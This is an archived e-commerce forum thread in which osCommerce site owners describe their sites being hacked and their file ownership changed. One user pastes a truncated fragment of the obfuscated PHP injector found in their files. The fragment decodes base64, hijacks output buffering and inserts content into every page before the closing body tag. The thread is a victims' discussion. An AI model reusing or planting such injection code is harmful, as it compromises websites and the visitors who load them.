Jump to content
  • Checkout
  • Login
  • Get in touch


The e-commerce.



Recommended Posts

Well it looks like I was hacked for the 3rd time

my website front was running fine BUT every file had added to it

this :-













Rlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo

ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp


PLUS looking at the files - the "ownership" had been changed and the database name was a different one.

Calling my webhosters resulted in absolutely nothing, no help, they did not understand and I dont know enough to

fully understand either. I have all my file permissions to the minimum to operate but to no avail.


I am seriously fed up

The database was called kulu sota


Just to let anyone else know out there of these problems - oh and do not use ixwebhosting - no customer service

Link to comment
Share on other sites

1. change host, I reccomend you look at http://www.reviewcentre.com/products100.html and choose a host with good scores + plenty of reviews, do a web search on any your considering.


2. Secure your site. http://www.oscommerce.com/forums/index.php?showtopic=313323



Remember, What you think I ment may not be what I thought I ment when I said it.




Auto Backup your Database, Easy way


Multi Images with Fancy Pop-ups, Easy way


Products in columns with multi buy etc etc


Disable any Category or Product, Easy way


Secure & Improve your account pages et al.

Link to comment
Share on other sites

  • 2 weeks later...

Same thing happened to me. on 8/11/08 "thegrand" took control of almost all of my files. I did not catch it till now. Funny thing is that ixwebhosting sent me an email on 8/11/08 informing me that they moved my site to another server due to too much traffic. I am convinced they new they were attacked thats why they moved me. Now they say it is not them, it was all my fault. ixwebhosting is crap! I would like to clean my files now, that they "fixed" the ownership back to me, but now I cannot identify them. I would like to know if there is a way to clean this exploit attacker out of all my files? I am changing hosting co. ASAP. I do not want to have to blow my site and all my mods to start over. Does anyone have idea for an easier fix? BTW - I have 3 sites that were attacked, and one of them was not even an osC site. :angry:



Link to comment
Share on other sites

  • 2 weeks later...



I too got the same hack, all my php files had the added code.


and I am also on ixwebhosting ... they told me it was MY problem.


all my php files and html files had the ownership changed to "edjackso"


now the difficulty I have with this is you have to be root the change the file ownership, a normal user cannot do this.


So I have spent the better part of the day fixing things up.

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Create New...